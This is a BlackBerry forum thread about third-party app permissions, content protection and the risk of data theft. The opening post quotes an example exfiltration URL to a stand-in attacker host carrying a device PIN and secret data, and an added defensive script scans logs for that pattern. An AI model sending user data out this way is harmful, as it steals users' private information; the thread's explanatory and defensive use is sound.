BlackBerry Forums Support Community


Preroll 08-26-2009 03:01 PM

Blackberry Security (Module Permissions)
 
I was reading the following article posted by Symantec:

http://www.symantec.com/avcenter/ref...ry.devices.pdf

I found one section to be quite scary:

Data Theft
A user installs some apparently useful application or video game. The application steals the user's information and the information is passed to the attacker via a HTTP GET request. I.e.:
http://www.badsite.com/upload?&PIN=9...his+is+top+secret+data


Anybody up on the level of actual attacks downloading third party applications and allowing User Data to be exploited?
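
Added example, not part of the original post or the Symantec paper: a defender-side check for the HTTP GET pattern quoted above (a device PIN plus free text in the query string), run over constructed proxy log lines. The log format, hostnames, parameter names other than PIN, and the length threshold are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# BlackBerry PINs are 8 hexadecimal characters.
PIN_RE = re.compile(r"^[0-9A-Fa-f]{8}$")
MIN_PAYLOAD_LEN = 16  # assumed threshold for free text riding in a query string

# Constructed sample lines in an assumed format: time client method url
SAMPLE_LOG = """\
2009-08-26T15:01:02 10.0.0.21 GET http://weather.example.test/today?city=Boston&units=F
2009-08-26T15:01:09 10.0.0.21 GET http://upload.example.test/upload?&PIN=2100000A&msg=this+is+top+secret+data
2009-08-26T15:02:40 10.0.0.35 GET http://shop.example.test/item?id=DEADBEEF
2009-08-26T15:04:00 10.0.0.40 GET http://games.example.test/score?device=2100000C&d=contacts%3A+alice+555-0100%3B+bob+555-0101
"""

def classify(url):
    """Return (reason, pin) when a query string carries a PIN-shaped value
    together with a long decoded value; otherwise None."""
    params = parse_qsl(urlsplit(url).query, keep_blank_values=True)
    pins = [(k, v) for k, v in params if PIN_RE.match(v)]
    if not pins:
        return None
    # A PIN-shaped value alone (e.g. a hex product id) is not enough to flag.
    payload = [v for _, v in params
               if not PIN_RE.match(v) and len(v) >= MIN_PAYLOAD_LEN]
    if not payload:
        return None
    named = [v for k, v in pins if k.lower() == "pin"]
    if named:
        return ("pin-param-with-payload", named[0])
    return ("pin-like-value-with-payload", pins[0][1])

def scan(log_text):
    """Return (time, client, host, reason, pin) for each flagged GET request."""
    findings = []
    for line in log_text.splitlines():
        parts = line.split(None, 3)
        if len(parts) != 4 or parts[2] != "GET":
            continue  # only the GET case described in the quoted text
        ts, client, _, url = parts
        hit = classify(url)
        if hit:
            findings.append((ts, client, urlsplit(url).hostname, hit[0], hit[1]))
    return findings

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(*finding)
```

The hex product id in the third sample line is deliberately not flagged, since an 8-hex value on its own is too common to alert on.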

SteveO86 08-26-2009 07:58 PM

Most applications that attempt to access those RIM APIs will most likely throw a message up and ask do you want to allow the connection, so the user (while unsuspecting) still has to say "yes".

I think it would be hard to find those apps, unless they really start showing up... When those types of applications do start appearing, you will see countless Blog posts from every major BlackBerry website posting warnings about the threat. (The BlackBerry community is great at keeping everyone in the "loop")

Preroll 08-27-2009 05:25 PM

I wonder if turning on content protection would prohibit the upload of user data? Seems that my unit slows way down when using content protection and the caller id from the phone book is gone when it's locked with a password.

DaBlackberryBoy 08-27-2009 06:21 PM

I would venture to say that hackers will see this thread and get ideas. I think the best protection is still, know what you install from who. I tend to go with companies that are partnered with Blackberry, which doesn't mean anything, but gives me some sort of sense of peace against stuff like this.

hrbuckley 08-27-2009 08:32 PM

Quote:

Originally Posted by SteveO86 (Post 1459599)
Most applications that attempt to access those RIM APIs will most likely throw a message up and ask do you want to allow the connection, so the user (while unsuspecting) still has to say "yes".

I think it would be hard to find those apps, unless they really start showing up... When those types of applications do start appearing, you will see countless Blog posts from every major BlackBerry website posting warnings about the threat. (The BlackBerry community is great at keeping everyone in the "loop")

There is a blog management application announced in this very forum that requests Input Simulation (Event Injection) permission to turn the camera off after taking a picture, and Security Timeout for some undisclosed purpose. With these two permissions any application can pwn your Blackberry. Yet when I voiced my concerns I was roundly ignored. So your hope that the blogosphere will protect us is, sadly, misplaced.

hrbuckley 08-27-2009 08:35 PM

Quote:

Originally Posted by Preroll (Post 1460370)
I wonder if turning on content protection would prohibit the upload of user data? Seems that my unit slows way down when using content protection and the caller id from the phone book is gone when it's locked with a password.

Not if you are going to give the application permission to access the data. If you don't grant permission then (in this case) content protection is irrelevant.

Preroll 08-28-2009 12:08 PM

Quote:

Originally Posted by hrbuckley (Post 1460469)
Not if you are going to give the application permission to access the data. If you don't grant permission then (in this case) content protection is irrelevant.

So if I DO give permission to the application to access the User Data and the data has Content Protection turned on with encryption, can that encrypted User Data still be jeopardized I guess is where I'm going with this?

hrbuckley 08-29-2009 10:01 AM

Content protection encrypts the data when it is not in use, and decrypts it "just in time" when an application accesses it. So if you grant malware permission to access your data then it will be able to access your data if you have content protection on or not.

The purpose of content protection is to prevent someone getting your data by dumping the memory from a lost or stolen Blackberry. It doesn't protect the data from applications loaded on the device, that is what application permissions do.

By the way, by default all applications are granted permission to access and change the PIM data.

Preroll 08-31-2009 12:44 PM

Quote:

Originally Posted by hrbuckley (Post 1461393)
Content protection encrypts the data when it is not in use, and decrypts it "just in time" when an application accesses it. So if you grant malware permission to access your data then it will be able to access your data if you have content protection on or not.

The purpose of content protection is to prevent someone getting your data by dumping the memory from a lost or stolen Blackberry. It doesn't protect the data from applications loaded on the device, that is what application permissions do.

By the way, by default all applications are granted permission to access and change the PIM data.

Thanks. That's what I was curious to find out. It's still kind of disconcerting that applications need access to the user data. Some work without it but most won't function with it set to deny. Obviously if it's an application that needs to access your contacts then it's understandable but there are others that don't so in that case I would assume there are other files needed under user data that it may need?

hrbuckley 08-31-2009 03:47 PM

Quote:

Originally Posted by Preroll (Post 1462589)
Thanks. That's what I was curious to find out. It's still kind of disconcerting that applications need access to the user data. Some work without it but most won't function with it set to deny. Obviously if it's an application that needs to access your contacts then it's understandable but there are others that don't so in that case I would assume there are other files needed under user data that it may need?

Some applications provide added value from accessing your data, if you want what they do for you. The Facebook contact list interface is a good one. You can say no and the remainder of Facebook continues to work.

What is really frustrating, especially with the Wordpress app, is that they have the framework to detect that the user said "No" to a particular permission, and then avoid functions that need it. Instead they (as of my last download) crash.

I forgot to mention before that you can, of course, set the defaults on your personal device to be more restrictive and keep all third party apps out of your PIM data, if that is what you want.

Preroll 08-31-2009 05:35 PM

Quote:

Originally Posted by hrbuckley (Post 1462694)
I forgot to mention before that you can, of course, set the defaults on your personal device to be more restrictive and keep all third party apps out of your PIM data, if that is what you want.

You mean by going to Application Permissions and changing Default Permissions?

hrbuckley 08-31-2009 07:23 PM

Yes. For installed apps you will/may have to go and change them individually.

